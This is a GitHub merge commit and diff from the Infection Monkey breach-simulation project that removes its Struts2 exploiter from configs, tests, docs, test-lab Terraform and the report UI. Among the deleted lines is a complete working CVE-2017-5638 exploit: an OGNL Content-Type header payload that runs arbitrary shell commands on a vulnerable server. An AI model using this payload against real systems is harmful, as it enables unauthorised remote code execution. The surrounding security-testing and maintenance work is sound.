Merge pull request #1873 from guardicore/1869-remove-struts2-exploit

Remove Struts2 exploiter
This commit is contained in:
Mike Salvatore 2022-04-10 09:39:37 -04:00 committed by GitHub
commit 727f19ecf6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
22 changed files with 1 additions and 307 deletions

View File

@ -54,6 +54,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
- 32-bit agents. #1675 - 32-bit agents. #1675
- Log path config options. #1761 - Log path config options. #1761
- "smb_service_name" option. #1741 - "smb_service_name" option. #1741
- Struts2 exploiter. #1869
### Fixed ### Fixed
- A bug in network map page that caused delay of telemetry log loading. #1545 - A bug in network map page that caused delay of telemetry log loading. #1545

View File

@ -1,9 +0,0 @@
---
title: "Struts2"
date: 2020-07-14T08:42:30+03:00
draft: false
tags: ["exploit", "linux", "windows"]
---
### Description
This exploit, CVE-2017-5638, utilizes the Struts 2 Java web framework. The logic is based on [VEX WOO's PoC](https://www.exploit-db.com/exploits/41570).

View File

@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"SSHExploiter", "SSHExploiter",
"Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",
"MSSQLExploiter", "MSSQLExploiter",
@ -27,8 +26,6 @@ class Performance(ConfigTemplate):
"basic_network.network_analysis.inaccessible_subnets": [ "basic_network.network_analysis.inaccessible_subnets": [
"10.2.2.0/30", "10.2.2.0/30",
"10.2.2.8/30", "10.2.2.8/30",
"10.2.2.24/32",
"10.2.2.23/32",
"10.2.2.21/32", "10.2.2.21/32",
"10.2.2.19/32", "10.2.2.19/32",
"10.2.2.18/32", "10.2.2.18/32",
@ -53,8 +50,6 @@ class Performance(ConfigTemplate):
"10.2.2.19", "10.2.2.19",
"10.2.2.20", "10.2.2.20",
"10.2.2.21", "10.2.2.21",
"10.2.2.23",
"10.2.2.24",
"10.2.2.25", "10.2.2.25",
"10.2.3.55", "10.2.3.55",
"10.2.3.56", "10.2.3.56",

View File

@ -1,19 +0,0 @@
from copy import copy
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
class Struts2(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update(
{
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
"basic_network.scope.depth": 2,
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
"internal.network.tcp_scanner.tcp_target_ports": [80, 8080],
}
)

View File

@ -7,8 +7,6 @@ GCP_TEST_MACHINE_LIST = {
"mssql-16", "mssql-16",
"mimikatz-14", "mimikatz-14",
"mimikatz-15", "mimikatz-15",
"struts2-23",
"struts2-24",
"tunneling-9", "tunneling-9",
"tunneling-10", "tunneling-10",
"tunneling-11", "tunneling-11",

View File

@ -22,7 +22,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse impo
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
@ -190,10 +189,6 @@ class TestMonkeyBlackbox:
def test_drupal_exploiter(self, island_client): def test_drupal_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter") TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
@pytest.mark.skip(reason="Struts2 exploiter is deprecated")
def test_struts_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
@pytest.mark.skip(reason="Weblogic exploiter is deprecated") @pytest.mark.skip(reason="Weblogic exploiter is deprecated")
def test_weblogic_exploiter(self, island_client): def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter") TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")

View File

@ -14,7 +14,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
SmbMimikatz, SmbMimikatz,
SmbPth, SmbPth,
Ssh, Ssh,
Struts2,
Tunneling, Tunneling,
Weblogic, Weblogic,
WmiMimikatz, WmiMimikatz,

View File

@ -22,8 +22,6 @@ This document describes Infection Monkeys test network, how to deploy and use
[Nr. 19 WebLogic](#_Toc526517181)<br> [Nr. 19 WebLogic](#_Toc526517181)<br>
[Nr. 21 Scan](#_Toc526517196)<br> [Nr. 21 Scan](#_Toc526517196)<br>
[Nr. 22 Scan](#_Toc526517197)<br> [Nr. 22 Scan](#_Toc526517197)<br>
[Nr. 23 Struts2](#_Toc536021476)<br>
[Nr. 24 Struts2](#_Toc536021477)<br>
[Nr. 25 Zerologon](#_Toc536021478)<br> [Nr. 25 Zerologon](#_Toc536021478)<br>
[Nr. 3-45 Powershell](#_Toc536021479)<br> [Nr. 3-45 Powershell](#_Toc536021479)<br>
[Nr. 3-46 Powershell](#_Toc536021480)<br> [Nr. 3-46 Powershell](#_Toc536021480)<br>
@ -776,74 +774,6 @@ Update all requirements using deployment script:<br>
</tbody> </tbody>
</table> </table>
<table>
<thead>
<tr class="header">
<th><p><span id="_Toc536021476" class="anchor"></span>Nr. <strong>23</strong> Struts2</p>
<p>(10.2.2.23)</p></th>
<th>(Vulnerable)</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>OS:</td>
<td><strong>Ubuntu 16.04.05 x64</strong></td>
</tr>
<tr class="even">
<td>Software:</td>
<td><p>JDK,</p>
<p>struts2 2.3.15.1,</p>
<p>tomcat 9.0.0.M9</p></td>
</tr>
<tr class="odd">
<td>Default servers port:</td>
<td>8080</td>
</tr>
<tr class="even">
<td>Servers config:</td>
<td>Default</td>
</tr>
<tr class="odd">
<td>Notes:</td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr class="header">
<th><p><span id="_Toc536021477" class="anchor"></span>Nr. <strong>24</strong> Struts2</p>
<p>(10.2.2.24)</p></th>
<th>(Vulnerable)</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>OS:</td>
<td><strong>Windows 10 x64</strong></td>
</tr>
<tr class="even">
<td>Software:</td>
<td><p>JDK,</p>
<p>struts2 2.3.15.1,</p>
<p>tomcat 9.0.0.M9</p></td>
</tr>
<tr class="odd">
<td>Default servers port:</td>
<td>8080</td>
</tr>
<tr class="even">
<td>Servers config:</td>
<td>Default</td>
</tr>
<tr class="odd">
<td>Notes:</td>
<td></td>
</tr>
</tbody>
</table>
<table> <table>
<thead> <thead>
<tr class="header"> <tr class="header">

View File

@ -99,14 +99,6 @@ data "google_compute_image" "scan-22" {
name = "scan-22" name = "scan-22"
project = local.monkeyzoo_project project = local.monkeyzoo_project
} }
data "google_compute_image" "struts2-23" {
name = "struts2-23"
project = local.monkeyzoo_project
}
data "google_compute_image" "struts2-24" {
name = "struts2-24"
project = local.monkeyzoo_project
}
data "google_compute_image" "zerologon-25" { data "google_compute_image" "zerologon-25" {
name = "zerologon-25" name = "zerologon-25"
project = local.monkeyzoo_project project = local.monkeyzoo_project

View File

@ -480,36 +480,6 @@ resource "google_compute_instance_from_template" "scan-22" {
} }
} }
resource "google_compute_instance_from_template" "struts2-23" {
name = "${local.resource_prefix}struts2-23"
source_instance_template = local.default_ubuntu
boot_disk{
initialize_params {
image = data.google_compute_image.struts2-23.self_link
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.23"
}
}
resource "google_compute_instance_from_template" "struts2-24" {
name = "${local.resource_prefix}struts2-24"
source_instance_template = local.default_windows
boot_disk{
initialize_params {
image = data.google_compute_image.struts2-24.self_link
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.24"
}
}
resource "google_compute_instance_from_template" "zerologon-25" { resource "google_compute_instance_from_template" "zerologon-25" {
name = "${local.resource_prefix}zerologon-25" name = "${local.resource_prefix}zerologon-25"
source_instance_template = local.default_windows source_instance_template = local.default_windows

View File

@ -1,90 +0,0 @@
"""
Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
code used is from https://www.exploit-db.com/exploits/41570/
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
"""
import http.client
import logging
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request
from typing import List, Tuple
from infection_monkey.exploit.web_rce import WebRCE
logger = logging.getLogger(__name__)
DOWNLOAD_TIMEOUT = 300
class Struts2Exploiter(WebRCE):
_EXPLOITED_SERVICE = "Struts2"
def __init__(self, host):
super(Struts2Exploiter, self).__init__(host, None)
def get_exploit_config(self):
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
exploit_config["dropper"] = True
return exploit_config
@staticmethod
def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]:
url_list = WebRCE.build_potential_urls(ip, ports)
url_list = [Struts2Exploiter.get_redirected(url) for url in url_list]
return url_list
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
request, context=ssl._create_unverified_context() # noqa: DUO122
).geturl()
except urllib.error.URLError:
logger.error("Can't reach struts2 server")
return False
def exploit(self, url, cmd):
"""
:param url: Full url to send request to
:param cmd: Code to try and execute on host
:return: response
"""
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = (
"%%{(#_='multipart/form-data')."
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
"(#_memberAccess?"
"(#_memberAccess=#dm):"
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
"(#ognlUtil.getExcludedPackageNames().clear())."
"(#ognlUtil.getExcludedClasses().clear())."
"(#context.setMemberAccess(#dm))))."
"(#cmd='%s')."
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
"(#p=new java.lang.ProcessBuilder(#cmds))."
"(#p.redirectErrorStream(true)).(#process=#p.start())."
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd
)
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output
page = urllib.request.urlopen(request).read()
except AttributeError:
# If url does not exist
return False
except http.client.IncompleteRead as e:
page = e.partial.decode()
return page

View File

@ -18,7 +18,6 @@ BASIC = {
"WmiExploiter", "WmiExploiter",
"SSHExploiter", "SSHExploiter",
"Log4ShellExploiter", "Log4ShellExploiter",
"Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",
"MSSQLExploiter", "MSSQLExploiter",

View File

@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference" "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/sshexec/", "/exploiters/sshexec/",
}, },
{
"type": "string",
"enum": ["Struts2Exploiter"],
"title": "Struts2 Exploiter",
"safe": True,
"info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
"https://www.exploit-db.com/exploits/41570 .",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
},
{ {
"type": "string", "type": "string",
"enum": ["WebLogicExploiter"], "enum": ["WebLogicExploiter"],

View File

@ -81,7 +81,6 @@ class AWSExporter(Exporter):
"shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue, "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
"shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue, "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
"strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue, "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue, ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue, ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
} }
@ -387,24 +386,6 @@ class AWSExporter(Exporter):
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
) )
@staticmethod
def _handle_struts2_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
severity=10,
title="Struts2 servers are vulnerable to remote code execution.",
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
"remote code execution attack."
"The attack was made possible because the server is using an old "
"version of Jakarta based file "
"upload Multipart parser.".format(
machine=issue["machine"], ip_address=issue["ip_address"]
),
instance_arn=instance_arn,
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod @staticmethod
def _handle_weblogic_issue(issue, instance_arn): def _handle_weblogic_issue(issue, instance_arn):

View File

@ -28,7 +28,6 @@ class ExploiterDescriptorEnum(Enum):
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor) SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor) WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor) SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
WEBLOGIC = ExploiterDescriptor( WEBLOGIC = ExploiterDescriptor(
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
) )

View File

@ -20,7 +20,6 @@ import guardicoreLogoImage from '../../images/guardicore-logo.png'
import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons'; import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
import '../../styles/App.css'; import '../../styles/App.css';
import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue'; import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
import {struts2IssueOverview, struts2IssueReport} from './security/issues/Struts2Issue';
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue'; import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue'; import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue'; import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
@ -78,11 +77,6 @@ class ReportPageComponent extends AuthComponent {
}, },
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
}, },
'Struts2Exploiter': {
[this.issueContentTypes.OVERVIEW]: struts2IssueOverview,
[this.issueContentTypes.REPORT]: struts2IssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'WebLogicExploiter': { 'WebLogicExploiter': {
[this.issueContentTypes.OVERVIEW]: webLogicIssueOverview, [this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
[this.issueContentTypes.REPORT]: webLogicIssueReport, [this.issueContentTypes.REPORT]: webLogicIssueReport,

View File

@ -1,26 +0,0 @@
import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell';
export function struts2IssueOverview() {
return (<li>Struts2 servers are vulnerable to remote code execution. (<a
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
CVE-2017-5638</a>)</li>)
}
export function struts2IssueReport(issue) {
return (
<>
Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
<CollapsibleWellComponent>
Struts2 server at <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="badge badge-danger">remote code execution</span> attack.
<br/>
The attack was made possible because the server is using an old version of Jakarta based file upload
Multipart parser. For possible work-arounds and more info read <a
href="https://cwiki.apache.org/confluence/display/WW/S2-045"
>here</a>.
</CollapsibleWellComponent>
</>
);
}

View File

@ -57,7 +57,6 @@
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}}, {"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
{"name": "Struts2Exploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}} {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
] ]

View File

@ -49,7 +49,6 @@
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"SSHExploiter", "SSHExploiter",
"Struts2Exploiter",
"ZerologonExploiter", "ZerologonExploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",

View File

@ -5,7 +5,6 @@
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"SSHExploiter", "SSHExploiter",
"Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",
"MSSQLExploiter", "MSSQLExploiter",

View File

@ -202,7 +202,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
{"name": "DrupalExploiter", "supported_os": [], "options": {}}, {"name": "DrupalExploiter", "supported_os": [], "options": {}},
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "Struts2Exploiter", "supported_os": [], "options": {}},
{"name": "WebLogicExploiter", "supported_os": [], "options": {}}, {"name": "WebLogicExploiter", "supported_os": [], "options": {}},
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}, {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
], ],

View File

@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23) password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30) SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31) SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43) HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44) MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)